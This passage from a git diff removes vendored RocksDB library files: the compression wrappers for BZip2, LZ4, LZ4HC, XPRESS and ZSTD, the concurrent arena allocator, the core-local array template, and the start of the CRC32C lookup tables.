-                              int* decompress_size,
-                              uint32_t compress_format_version) {
-#ifdef BZIP2
-  uint32_t output_len = 0;
-  if (compress_format_version == 2) {
-    if (!compression::GetDecompressedSizeInfo(&input_data, &input_length,
-                                              &output_len)) {
-      return nullptr;
-    }
-  } else {
-    // Assume the decompressed data size will 5x of compressed size, but round
-    // to the next page size
-    size_t proposed_output_len = ((input_length * 5) & (~(4096 - 1))) + 4096;
-    output_len = static_cast<uint32_t>(
-        std::min(proposed_output_len,
-                 static_cast<size_t>(std::numeric_limits<uint32_t>::max())));
-  }
-
-  bz_stream _stream;
-  memset(&_stream, 0, sizeof(bz_stream));
-
-  int st = BZ2_bzDecompressInit(&_stream, 0, 0);
-  if (st != BZ_OK) {
-    return nullptr;
-  }
-
-  _stream.next_in = (char *)input_data;
-  _stream.avail_in = static_cast<unsigned int>(input_length);
-
-  char* output = new char[output_len];
-
-  _stream.next_out = (char *)output;
-  _stream.avail_out = static_cast<unsigned int>(output_len);
-
-  bool done = false;
-  while (!done) {
-    st = BZ2_bzDecompress(&_stream);
-    switch (st) {
-      case BZ_STREAM_END:
-        done = true;
-        break;
-      case BZ_OK: {
-        // No output space. Increase the output space by 20%.
-        // We should never run out of output space if
-        // compress_format_version == 2
-        assert(compress_format_version != 2);
-        uint32_t old_sz = output_len;
-        output_len = output_len * 1.2;
-        char* tmp = new char[output_len];
-        memcpy(tmp, output, old_sz);
-        delete[] output;
-        output = tmp;
-
-        // Set more output.
-        _stream.next_out = (char *)(output + old_sz);
-        _stream.avail_out = static_cast<unsigned int>(output_len - old_sz);
-        break;
-      }
-      default:
-        delete[] output;
-        BZ2_bzDecompressEnd(&_stream);
-        return nullptr;
-    }
-  }
-
-  // If we encoded decompressed block size, we should have no bytes left
-  assert(compress_format_version != 2 || _stream.avail_out == 0);
-  *decompress_size = static_cast<int>(output_len - _stream.avail_out);
-  BZ2_bzDecompressEnd(&_stream);
-  return output;
-#endif
-  return nullptr;
-}
-
-// compress_format_version == 1 -- decompressed size is included in the
-// block header using memcpy, which makes database non-portable)
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline bool LZ4_Compress(const CompressionOptions& opts,
-                         uint32_t compress_format_version, const char* input,
-                         size_t length, ::std::string* output,
-                         const Slice compression_dict = Slice()) {
-#ifdef LZ4
-  if (length > std::numeric_limits<uint32_t>::max()) {
-    // Can't compress more than 4GB
-    return false;
-  }
-
-  size_t output_header_len = 0;
-  if (compress_format_version == 2) {
-    // new encoding, using varint32 to store size information
-    output_header_len = compression::PutDecompressedSizeInfo(
-        output, static_cast<uint32_t>(length));
-  } else {
-    // legacy encoding, which is not really portable (depends on big/little
-    // endianness)
-    output_header_len = 8;
-    output->resize(output_header_len);
-    char* p = const_cast<char*>(output->c_str());
-    memcpy(p, &length, sizeof(length));
-  }
-  int compress_bound = LZ4_compressBound(static_cast<int>(length));
-  output->resize(static_cast<size_t>(output_header_len + compress_bound));
-
-  int outlen;
-#if LZ4_VERSION_NUMBER >= 10400  // r124+
-  LZ4_stream_t* stream = LZ4_createStream();
-  if (compression_dict.size()) {
-    LZ4_loadDict(stream, compression_dict.data(),
-                 static_cast<int>(compression_dict.size()));
-  }
-#if LZ4_VERSION_NUMBER >= 10700  // r129+
-  outlen = LZ4_compress_fast_continue(
-      stream, input, &(*output)[output_header_len], static_cast<int>(length),
-      compress_bound, 1);
-#else  // up to r128
-  outlen = LZ4_compress_limitedOutput_continue(
-      stream, input, &(*output)[output_header_len], static_cast<int>(length),
-      compress_bound);
-#endif
-  LZ4_freeStream(stream);
-#else   // up to r123
-  outlen = LZ4_compress_limitedOutput(input, &(*output)[output_header_len],
-                                      static_cast<int>(length), compress_bound);
-#endif  // LZ4_VERSION_NUMBER >= 10400
-
-  if (outlen == 0) {
-    return false;
-  }
-  output->resize(static_cast<size_t>(output_header_len + outlen));
-  return true;
-#endif  // LZ4
-  return false;
-}
-
-// compress_format_version == 1 -- decompressed size is included in the
-// block header using memcpy, which makes database non-portable)
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline char* LZ4_Uncompress(const char* input_data, size_t input_length,
-                            int* decompress_size,
-                            uint32_t compress_format_version,
-                            const Slice& compression_dict = Slice()) {
-#ifdef LZ4
-  uint32_t output_len = 0;
-  if (compress_format_version == 2) {
-    // new encoding, using varint32 to store size information
-    if (!compression::GetDecompressedSizeInfo(&input_data, &input_length,
-                                              &output_len)) {
-      return nullptr;
-    }
-  } else {
-    // legacy encoding, which is not really portable (depends on big/little
-    // endianness)
-    if (input_length < 8) {
-      return nullptr;
-    }
-    memcpy(&output_len, input_data, sizeof(output_len));
-    input_length -= 8;
-    input_data += 8;
-  }
-
-  char* output = new char[output_len];
-#if LZ4_VERSION_NUMBER >= 10400  // r124+
-  LZ4_streamDecode_t* stream = LZ4_createStreamDecode();
-  if (compression_dict.size()) {
-    LZ4_setStreamDecode(stream, compression_dict.data(),
-                        static_cast<int>(compression_dict.size()));
-  }
-  *decompress_size = LZ4_decompress_safe_continue(
-      stream, input_data, output, static_cast<int>(input_length),
-      static_cast<int>(output_len));
-  LZ4_freeStreamDecode(stream);
-#else   // up to r123
-  *decompress_size =
-      LZ4_decompress_safe(input_data, output, static_cast<int>(input_length),
-                          static_cast<int>(output_len));
-#endif  // LZ4_VERSION_NUMBER >= 10400
-
-  if (*decompress_size < 0) {
-    delete[] output;
-    return nullptr;
-  }
-  assert(*decompress_size == static_cast<int>(output_len));
-  return output;
-#endif  // LZ4
-  return nullptr;
-}
-
-// compress_format_version == 1 -- decompressed size is included in the
-// block header using memcpy, which makes database non-portable)
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline bool LZ4HC_Compress(const CompressionOptions& opts,
-                           uint32_t compress_format_version, const char* input,
-                           size_t length, ::std::string* output,
-                           const Slice& compression_dict = Slice()) {
-#ifdef LZ4
-  if (length > std::numeric_limits<uint32_t>::max()) {
-    // Can't compress more than 4GB
-    return false;
-  }
-
-  size_t output_header_len = 0;
-  if (compress_format_version == 2) {
-    // new encoding, using varint32 to store size information
-    output_header_len = compression::PutDecompressedSizeInfo(
-        output, static_cast<uint32_t>(length));
-  } else {
-    // legacy encoding, which is not really portable (depends on big/little
-    // endianness)
-    output_header_len = 8;
-    output->resize(output_header_len);
-    char* p = const_cast<char*>(output->c_str());
-    memcpy(p, &length, sizeof(length));
-  }
-  int compress_bound = LZ4_compressBound(static_cast<int>(length));
-  output->resize(static_cast<size_t>(output_header_len + compress_bound));
-
-  int outlen;
-#if LZ4_VERSION_NUMBER >= 10400  // r124+
-  LZ4_streamHC_t* stream = LZ4_createStreamHC();
-  LZ4_resetStreamHC(stream, opts.level);
-  const char* compression_dict_data =
-      compression_dict.size() > 0 ? compression_dict.data() : nullptr;
-  size_t compression_dict_size = compression_dict.size();
-  LZ4_loadDictHC(stream, compression_dict_data,
-                 static_cast<int>(compression_dict_size));
-
-#if LZ4_VERSION_NUMBER >= 10700  // r129+
-  outlen =
-      LZ4_compress_HC_continue(stream, input, &(*output)[output_header_len],
-                               static_cast<int>(length), compress_bound);
-#else   // r124-r128
-  outlen = LZ4_compressHC_limitedOutput_continue(
-      stream, input, &(*output)[output_header_len], static_cast<int>(length),
-      compress_bound);
-#endif  // LZ4_VERSION_NUMBER >= 10700
-  LZ4_freeStreamHC(stream);
-
-#elif LZ4_VERSION_MAJOR  // r113-r123
-  outlen = LZ4_compressHC2_limitedOutput(input, &(*output)[output_header_len],
-                                         static_cast<int>(length),
-                                         compress_bound, opts.level);
-#else                    // up to r112
-  outlen =
-      LZ4_compressHC_limitedOutput(input, &(*output)[output_header_len],
-                                   static_cast<int>(length), compress_bound);
-#endif                   // LZ4_VERSION_NUMBER >= 10400
-
-  if (outlen == 0) {
-    return false;
-  }
-  output->resize(static_cast<size_t>(output_header_len + outlen));
-  return true;
-#endif  // LZ4
-  return false;
-}
-
-inline bool XPRESS_Compress(const char* input, size_t length, std::string* output) {
-#ifdef XPRESS
-  return port::xpress::Compress(input, length, output);
-#endif
-  return false;
-}
-
-inline char* XPRESS_Uncompress(const char* input_data, size_t input_length,
-  int* decompress_size) {
-#ifdef XPRESS
-  return port::xpress::Decompress(input_data, input_length, decompress_size);
-#endif
-  return nullptr;
-}
-
-
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline bool ZSTD_Compress(const CompressionOptions& opts, const char* input,
-                          size_t length, ::std::string* output,
-                          const Slice& compression_dict = Slice()) {
-#ifdef ZSTD
-  if (length > std::numeric_limits<uint32_t>::max()) {
-    // Can't compress more than 4GB
-    return false;
-  }
-
-  size_t output_header_len = compression::PutDecompressedSizeInfo(
-      output, static_cast<uint32_t>(length));
-
-  size_t compressBound = ZSTD_compressBound(length);
-  output->resize(static_cast<size_t>(output_header_len + compressBound));
-  size_t outlen;
-#if ZSTD_VERSION_NUMBER >= 500  // v0.5.0+
-  ZSTD_CCtx* context = ZSTD_createCCtx();
-  outlen = ZSTD_compress_usingDict(
-      context, &(*output)[output_header_len], compressBound, input, length,
-      compression_dict.data(), compression_dict.size(), opts.level);
-  ZSTD_freeCCtx(context);
-#else  // up to v0.4.x
-  outlen = ZSTD_compress(&(*output)[output_header_len], compressBound, input,
-                         length, opts.level);
-#endif  // ZSTD_VERSION_NUMBER >= 500
-  if (outlen == 0) {
-    return false;
-  }
-  output->resize(output_header_len + outlen);
-  return true;
-#endif
-  return false;
-}
-
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline char* ZSTD_Uncompress(const char* input_data, size_t input_length,
-                             int* decompress_size,
-                             const Slice& compression_dict = Slice()) {
-#ifdef ZSTD
-  uint32_t output_len = 0;
-  if (!compression::GetDecompressedSizeInfo(&input_data, &input_length,
-                                            &output_len)) {
-    return nullptr;
-  }
-
-  char* output = new char[output_len];
-  size_t actual_output_length;
-#if ZSTD_VERSION_NUMBER >= 500  // v0.5.0+
-  ZSTD_DCtx* context = ZSTD_createDCtx();
-  actual_output_length = ZSTD_decompress_usingDict(
-      context, output, output_len, input_data, input_length,
-      compression_dict.data(), compression_dict.size());
-  ZSTD_freeDCtx(context);
-#else  // up to v0.4.x
-  actual_output_length =
-      ZSTD_decompress(output, output_len, input_data, input_length);
-#endif  // ZSTD_VERSION_NUMBER >= 500
-  assert(actual_output_length == output_len);
-  *decompress_size = static_cast<int>(actual_output_length);
-  return output;
-#endif
-  return nullptr;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/concurrent_arena.cc b/thirdparty/rocksdb/util/concurrent_arena.cc
deleted file mode 100644
index 07fa03c..0000000
--- a/thirdparty/rocksdb/util/concurrent_arena.cc
+++ /dev/null
@@ -1,39 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/concurrent_arena.h"
-#include <thread>
-#include "port/port.h"
-#include "util/random.h"
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-__thread size_t ConcurrentArena::tls_cpuid = 0;
-#endif
-
-ConcurrentArena::ConcurrentArena(size_t block_size, AllocTracker* tracker,
-                                 size_t huge_page_size)
-    : shard_block_size_(block_size / 8),
-      shards_(),
-      arena_(block_size, tracker, huge_page_size) {
-  Fixup();
-}
-
-ConcurrentArena::Shard* ConcurrentArena::Repick() {
-  auto shard_and_index = shards_.AccessElementAndIndex();
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-  // even if we are cpu 0, use a non-zero tls_cpuid so we can tell we
-  // have repicked
-  tls_cpuid = shard_and_index.second | shards_.Size();
-#endif
-  return shard_and_index.first;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/concurrent_arena.h b/thirdparty/rocksdb/util/concurrent_arena.h
deleted file mode 100644
index 1ab88c7..0000000
--- a/thirdparty/rocksdb/util/concurrent_arena.h
+++ /dev/null
@@ -1,215 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <atomic>
-#include <memory>
-#include <utility>
-#include "port/likely.h"
-#include "util/allocator.h"
-#include "util/arena.h"
-#include "util/core_local.h"
-#include "util/mutexlock.h"
-#include "util/thread_local.h"
-
-// Only generate field unused warning for padding array, or build under
-// GCC 4.8.1 will fail.
-#ifdef __clang__
-#define ROCKSDB_FIELD_UNUSED __attribute__((__unused__))
-#else
-#define ROCKSDB_FIELD_UNUSED
-#endif  // __clang__
-
-namespace rocksdb {
-
-class Logger;
-
-// ConcurrentArena wraps an Arena.  It makes it thread safe using a fast
-// inlined spinlock, and adds small per-core allocation caches to avoid
-// contention for small allocations.  To avoid any memory waste from the
-// per-core shards, they are kept small, they are lazily instantiated
-// only if ConcurrentArena actually notices concurrent use, and they
-// adjust their size so that there is no fragmentation waste when the
-// shard blocks are allocated from the underlying main arena.
-class ConcurrentArena : public Allocator {
- public:
-  // block_size and huge_page_size are the same as for Arena (and are
-  // in fact just passed to the constructor of arena_.  The core-local
-  // shards compute their shard_block_size as a fraction of block_size
-  // that varies according to the hardware concurrency level.
-  explicit ConcurrentArena(size_t block_size = Arena::kMinBlockSize,
-                           AllocTracker* tracker = nullptr,
-                           size_t huge_page_size = 0);
-
-  char* Allocate(size_t bytes) override {
-    return AllocateImpl(bytes, false /*force_arena*/,
-                        [=]() { return arena_.Allocate(bytes); });
-  }
-
-  char* AllocateAligned(size_t bytes, size_t huge_page_size = 0,
-                        Logger* logger = nullptr) override {
-    size_t rounded_up = ((bytes - 1) | (sizeof(void*) - 1)) + 1;
-    assert(rounded_up >= bytes && rounded_up < bytes + sizeof(void*) &&
-           (rounded_up % sizeof(void*)) == 0);
-
-    return AllocateImpl(rounded_up, huge_page_size != 0 /*force_arena*/, [=]() {
-      return arena_.AllocateAligned(rounded_up, huge_page_size, logger);
-    });
-  }
-
-  size_t ApproximateMemoryUsage() const {
-    std::unique_lock<SpinMutex> lock(arena_mutex_, std::defer_lock);
-    lock.lock();
-    return arena_.ApproximateMemoryUsage() - ShardAllocatedAndUnused();
-  }
-
-  size_t MemoryAllocatedBytes() const {
-    return memory_allocated_bytes_.load(std::memory_order_relaxed);
-  }
-
-  size_t AllocatedAndUnused() const {
-    return arena_allocated_and_unused_.load(std::memory_order_relaxed) +
-           ShardAllocatedAndUnused();
-  }
-
-  size_t IrregularBlockNum() const {
-    return irregular_block_num_.load(std::memory_order_relaxed);
-  }
-
-  size_t BlockSize() const override { return arena_.BlockSize(); }
-
- private:
-  struct Shard {
-    char padding[40] ROCKSDB_FIELD_UNUSED;
-    mutable SpinMutex mutex;
-    char* free_begin_;
-    std::atomic<size_t> allocated_and_unused_;
-
-    Shard() : allocated_and_unused_(0) {}
-  };
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-  static __thread size_t tls_cpuid;
-#else
-  enum ZeroFirstEnum : size_t { tls_cpuid = 0 };
-#endif
-
-  char padding0[56] ROCKSDB_FIELD_UNUSED;
-
-  size_t shard_block_size_;
-
-  CoreLocalArray<Shard> shards_;
-
-  Arena arena_;
-  mutable SpinMutex arena_mutex_;
-  std::atomic<size_t> arena_allocated_and_unused_;
-  std::atomic<size_t> memory_allocated_bytes_;
-  std::atomic<size_t> irregular_block_num_;
-
-  char padding1[56] ROCKSDB_FIELD_UNUSED;
-
-  Shard* Repick();
-
-  size_t ShardAllocatedAndUnused() const {
-    size_t total = 0;
-    for (size_t i = 0; i < shards_.Size(); ++i) {
-      total += shards_.AccessAtCore(i)->allocated_and_unused_.load(
-          std::memory_order_relaxed);
-    }
-    return total;
-  }
-
-  template <typename Func>
-  char* AllocateImpl(size_t bytes, bool force_arena, const Func& func) {
-    size_t cpu;
-
-    // Go directly to the arena if the allocation is too large, or if
-    // we've never needed to Repick() and the arena mutex is available
-    // with no waiting.  This keeps the fragmentation penalty of
-    // concurrency zero unless it might actually confer an advantage.
-    std::unique_lock<SpinMutex> arena_lock(arena_mutex_, std::defer_lock);
-    if (bytes > shard_block_size_ / 4 || force_arena ||
-        ((cpu = tls_cpuid) == 0 &&
-         !shards_.AccessAtCore(0)->allocated_and_unused_.load(
-             std::memory_order_relaxed) &&
-         arena_lock.try_lock())) {
-      if (!arena_lock.owns_lock()) {
-        arena_lock.lock();
-      }
-      auto rv = func();
-      Fixup();
-      return rv;
-    }
-
-    // pick a shard from which to allocate
-    Shard* s = shards_.AccessAtCore(cpu & (shards_.Size() - 1));
-    if (!s->mutex.try_lock()) {
-      s = Repick();
-      s->mutex.lock();
-    }
-    std::unique_lock<SpinMutex> lock(s->mutex, std::adopt_lock);
-
-    size_t avail = s->allocated_and_unused_.load(std::memory_order_relaxed);
-    if (avail < bytes) {
-      // reload
-      std::lock_guard<SpinMutex> reload_lock(arena_mutex_);
-
-      // If the arena's current block is within a factor of 2 of the right
-      // size, we adjust our request to avoid arena waste.
-      auto exact = arena_allocated_and_unused_.load(std::memory_order_relaxed);
-      assert(exact == arena_.AllocatedAndUnused());
-
-      if (exact >= bytes && arena_.IsInInlineBlock()) {
-        // If we haven't exhausted arena's inline block yet, allocate from arena
-        // directly. This ensures that we'll do the first few small allocations
-        // without allocating any blocks.
-        // In particular this prevents empty memtables from using
-        // disproportionately large amount of memory: a memtable allocates on
-        // the order of 1 KB of memory when created; we wouldn't want to
-        // allocate a full arena block (typically a few megabytes) for that,
-        // especially if there are thousands of empty memtables.
-        auto rv = func();
-        Fixup();
-        return rv;
-      }
-
-      avail = exact >= shard_block_size_ / 2 && exact < shard_block_size_ * 2
-                  ? exact
-                  : shard_block_size_;
-      s->free_begin_ = arena_.AllocateAligned(avail);
-      Fixup();
-    }
-    s->allocated_and_unused_.store(avail - bytes, std::memory_order_relaxed);
-
-    char* rv;
-    if ((bytes % sizeof(void*)) == 0) {
-      // aligned allocation from the beginning
-      rv = s->free_begin_;
-      s->free_begin_ += bytes;
-    } else {
-      // unaligned from the end
-      rv = s->free_begin_ + avail - bytes;
-    }
-    return rv;
-  }
-
-  void Fixup() {
-    arena_allocated_and_unused_.store(arena_.AllocatedAndUnused(),
-                                      std::memory_order_relaxed);
-    memory_allocated_bytes_.store(arena_.MemoryAllocatedBytes(),
-                                  std::memory_order_relaxed);
-    irregular_block_num_.store(arena_.IrregularBlockNum(),
-                               std::memory_order_relaxed);
-  }
-
-  ConcurrentArena(const ConcurrentArena&) = delete;
-  ConcurrentArena& operator=(const ConcurrentArena&) = delete;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/core_local.h b/thirdparty/rocksdb/util/core_local.h
deleted file mode 100644
index 4cc4fd9..0000000
--- a/thirdparty/rocksdb/util/core_local.h
+++ /dev/null
@@ -1,83 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <cstddef>
-#include <thread>
-#include <utility>
-#include <vector>
-
-#include "port/likely.h"
-#include "port/port.h"
-#include "util/random.h"
-
-namespace rocksdb {
-
-// An array of core-local values. Ideally the value type, T, is cache aligned to
-// prevent false sharing.
-template <typename T>
-class CoreLocalArray {
- public:
-  CoreLocalArray();
-
-  size_t Size() const;
-  // returns pointer to the element corresponding to the core that the thread
-  // currently runs on.
-  T* Access() const;
-  // same as above, but also returns the core index, which the client can cache
-  // to reduce how often core ID needs to be retrieved. Only do this if some
-  // inaccuracy is tolerable, as the thread may migrate to a different core.
-  std::pair<T*, size_t> AccessElementAndIndex() const;
-  // returns pointer to element for the specified core index. This can be used,
-  // e.g., for aggregation, or if the client caches core index.
-  T* AccessAtCore(size_t core_idx) const;
-
- private:
-  std::unique_ptr<T[]> data_;
-  int size_shift_;
-};
-
-template <typename T>
-CoreLocalArray<T>::CoreLocalArray() {
-  int num_cpus = static_cast<int>(std::thread::hardware_concurrency());
-  // find a power of two >= num_cpus and >= 8
-  size_shift_ = 3;
-  while (1 << size_shift_ < num_cpus) {
-    ++size_shift_;
-  }
-  data_.reset(new T[static_cast<size_t>(1) << size_shift_]);
-}
-
-template <typename T>
-size_t CoreLocalArray<T>::Size() const {
-  return static_cast<size_t>(1) << size_shift_;
-}
-
-template <typename T>
-T* CoreLocalArray<T>::Access() const {
-  return AccessElementAndIndex().first;
-}
-
-template <typename T>
-std::pair<T*, size_t> CoreLocalArray<T>::AccessElementAndIndex() const {
-  int cpuid = port::PhysicalCoreID();
-  size_t core_idx;
-  if (UNLIKELY(cpuid < 0)) {
-    // cpu id unavailable, just pick randomly
-    core_idx = Random::GetTLSInstance()->Uniform(1 << size_shift_);
-  } else {
-    core_idx = static_cast<size_t>(cpuid & ((1 << size_shift_) - 1));
-  }
-  return {AccessAtCore(core_idx), core_idx};
-}
-
-template <typename T>
-T* CoreLocalArray<T>::AccessAtCore(size_t core_idx) const {
-  assert(core_idx < static_cast<size_t>(1) << size_shift_);
-  return &data_[core_idx];
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/crc32c.cc b/thirdparty/rocksdb/util/crc32c.cc
deleted file mode 100644
index ae36f82..0000000
--- a/thirdparty/rocksdb/util/crc32c.cc
+++ /dev/null
@@ -1,408 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A portable implementation of crc32c, optimized to handle
-// four bytes at a time.
-
-#include "util/crc32c.h"
-
-#include <stdint.h>
-#ifdef HAVE_SSE42
-#include <nmmintrin.h>
-#endif
-#include "util/coding.h"
-
-namespace rocksdb {
-namespace crc32c {
-
-static const uint32_t table0_[256] = {
-  0x00000000, 0xf26b8303, 0xe13b70f7, 0x1350f3f4,
-  0xc79a971f, 0x35f1141c, 0x26a1e7e8, 0xd4ca64eb,
-  0x8ad958cf, 0x78b2dbcc, 0x6be22838, 0x9989ab3b,
-  0x4d43cfd0, 0xbf284cd3, 0xac78bf27, 0x5e133c24,
-  0x105ec76f, 0xe235446c, 0xf165b798, 0x030e349b,
-  0xd7c45070, 0x25afd373, 0x36ff2087, 0xc494a384,
-  0x9a879fa0, 0x68ec1ca3, 0x7bbcef57, 0x89d76c54,
-  0x5d1d08bf, 0xaf768bbc, 0xbc267848, 0x4e4dfb4b,
-  0x20bd8ede, 0xd2d60ddd, 0xc186fe29, 0x33ed7d2a,
-  0xe72719c1, 0x154c9ac2, 0x061c6936, 0xf477ea35,
-  0xaa64d611, 0x580f5512, 0x4b5fa6e6, 0xb93425e5,
-  0x6dfe410e, 0x9f95c20d, 0x8cc531f9, 0x7eaeb2fa,
-  0x30e349b1, 0xc288cab2, 0xd1d83946, 0x23b3ba45,
-  0xf779deae, 0x05125dad, 0x1642ae59, 0xe4292d5a,
-  0xba3a117e, 0x4851927d, 0x5b016189, 0xa96ae28a,
-  0x7da08661, 0x8fcb0562, 0x9c9bf696, 0x6ef07595,
-  0x417b1dbc, 0xb3109ebf, 0xa0406d4b, 0x522bee48,
-  0x86e18aa3, 0x748a09a0, 0x67dafa54, 0x95b17957,
-  0xcba24573, 0x39c9c670, 0x2a993584, 0xd8f2b687,
-  0x0c38d26c, 0xfe53516f, 0xed03a29b, 0x1f682198,
-  0x5125dad3, 0xa34e59d0, 0xb01eaa24, 0x42752927,
-  0x96bf4dcc, 0x64d4cecf, 0x77843d3b, 0x85efbe38,
-  0xdbfc821c, 0x2997011f, 0x3ac7f2eb, 0xc8ac71e8,
-  0x1c661503, 0xee0d9600, 0xfd5d65f4, 0x0f36e6f7,
-  0x61c69362, 0x93ad1061, 0x80fde395, 0x72966096,
-  0xa65c047d, 0x5437877e, 0x4767748a, 0xb50cf789,
-  0xeb1fcbad, 0x197448ae, 0x0a24bb5a, 0xf84f3859,
-  0x2c855cb2, 0xdeeedfb1, 0xcdbe2c45, 0x3fd5af46,
-  0x7198540d, 0x83f3d70e, 0x90a324fa, 0x62c8a7f9,
-  0xb602c312, 0x44694011, 0x5739b3e5, 0xa55230e6,
-  0xfb410cc2, 0x092a8fc1, 0x1a7a7c35, 0xe811ff36,
-  0x3cdb9bdd, 0xceb018de, 0xdde0eb2a, 0x2f8b6829,
-  0x82f63b78, 0x709db87b, 0x63cd4b8f, 0x91a6c88c,
-  0x456cac67, 0xb7072f64, 0xa457dc90, 0x563c5f93,
-  0x082f63b7, 0xfa44e0b4, 0xe9141340, 0x1b7f9043,
-  0xcfb5f4a8, 0x3dde77ab, 0x2e8e845f, 0xdce5075c,
-  0x92a8fc17, 0x60c37f14, 0x73938ce0, 0x81f80fe3,
-  0x55326b08, 0xa759e80b, 0xb4091bff, 0x466298fc,
-  0x1871a4d8, 0xea1a27db, 0xf94ad42f, 0x0b21572c,
-  0xdfeb33c7, 0x2d80b0c4, 0x3ed04330, 0xccbbc033,
-  0xa24bb5a6, 0x502036a5, 0x4370c551, 0xb11b4652,
-  0x65d122b9, 0x97baa1ba, 0x84ea524e, 0x7681d14d,
-  0x2892ed69, 0xdaf96e6a, 0xc9a99d9e, 0x3bc21e9d,
-  0xef087a76, 0x1d63f975, 0x0e330a81, 0xfc588982,
-  0xb21572c9, 0x407ef1ca, 0x532e023e, 0xa145813d,
-  0x758fe5d6, 0x87e466d5, 0x94b49521, 0x66df1622,
-  0x38cc2a06, 0xcaa7a905, 0xd9f75af1, 0x2b9cd9f2,
-  0xff56bd19, 0x0d3d3e1a, 0x1e6dcdee, 0xec064eed,
-  0xc38d26c4, 0x31e6a5c7, 0x22b65633, 0xd0ddd530,
-  0x0417b1db, 0xf67c32d8, 0xe52cc12c, 0x1747422f,
-  0x49547e0b, 0xbb3ffd08, 0xa86f0efc, 0x5a048dff,
-  0x8ecee914, 0x7ca56a17, 0x6ff599e3, 0x9d9e1ae0,
-  0xd3d3e1ab, 0x21b862a8, 0x32e8915c, 0xc083125f,
-  0x144976b4, 0xe622f5b7, 0xf5720643, 0x07198540,
-  0x590ab964, 0xab613a67, 0xb831c993, 0x4a5a4a90,
-  0x9e902e7b, 0x6cfbad78, 0x7fab5e8c, 0x8dc0dd8f,
-  0xe330a81a, 0x115b2b19, 0x020bd8ed, 0xf0605bee,
-  0x24aa3f05, 0xd6c1bc06, 0xc5914ff2, 0x37faccf1,
-  0x69e9f0d5, 0x9b8273d6, 0x88d28022, 0x7ab90321,
-  0xae7367ca, 0x5c18e4c9, 0x4f48173d, 0xbd23943e,
-  0xf36e6f75, 0x0105ec76, 0x12551f82, 0xe03e9c81,
-  0x34f4f86a, 0xc69f7b69, 0xd5cf889d, 0x27a40b9e,
-  0x79b737ba, 0x8bdcb4b9, 0x988c474d, 0x6ae7c44e,
-  0xbe2da0a5, 0x4c4623a6, 0x5f16d052, 0xad7d5351
-};
-static const uint32_t table1_[256] = {
-  0x00000000, 0x13a29877, 0x274530ee, 0x34e7a899,
-  0x4e8a61dc, 0x5d28f9ab, 0x69cf5132, 0x7a6dc945,
-  0x9d14c3b8, 0x8eb65bcf, 0xba51f356, 0xa9f36b21,
-  0xd39ea264, 0xc03c3a13, 0xf4db928a, 0xe7790afd,
-  0x3fc5f181, 0x2c6769f6, 0x1880c16f, 0x0b225918,
-  0x714f905d, 0x62ed082a, 0x560aa0b3, 0x45a838c4,
-  0xa2d13239, 0xb173aa4e, 0x859402d7, 0x96369aa0,
-  0xec5b53e5, 0xfff9cb92, 0xcb1e630b, 0xd8bcfb7c,
-  0x7f8be302, 0x6c297b75, 0x58ced3ec, 0x4b6c4b9b,
-  0x310182de, 0x22a31aa9, 0x1644b230, 0x05e62a47,
-  0xe29f20ba, 0xf13db8cd, 0xc5da1054, 0xd6788823,
-  0xac154166, 0xbfb7d911, 0x8b507188, 0x98f2e9ff,
-  0x404e1283, 0x53ec8af4, 0x670b226d, 0x74a9ba1a,
-  0x0ec4735f, 0x1d66eb28, 0x298143b1, 0x3a23dbc6,
-  0xdd5ad13b, 0xcef8494c, 0xfa1fe1d5, 0xe9bd79a2,
-  0x93d0b0e7, 0x80722890, 0xb4958009, 0xa737187e,
-  0xff17c604, 0xecb55e73, 0xd852f6ea, 0xcbf06e9d,
-  0xb19da7d8, 0xa23f3faf, 0x96d89736, 0x857a0f41,
-  0x620305bc, 0x71a19dcb, 0x45463552, 0x56e4ad25,
-  0x2c896460, 0x3f2bfc17, 0x0bcc548e, 0x186eccf9,
-  0xc0d23785, 0xd370aff2, 0xe797076b, 0xf4359f1c,
-  0x8e585659, 0x9dface2e, 0xa91d66b7, 0xbabffec0,
-  0x5dc6f43d, 0x4e646c4a, 0x7a83c4d3, 0x69215ca4,
-  0x134c95e1, 0x00ee0d96, 0x3409a50f, 0x27ab3d78,
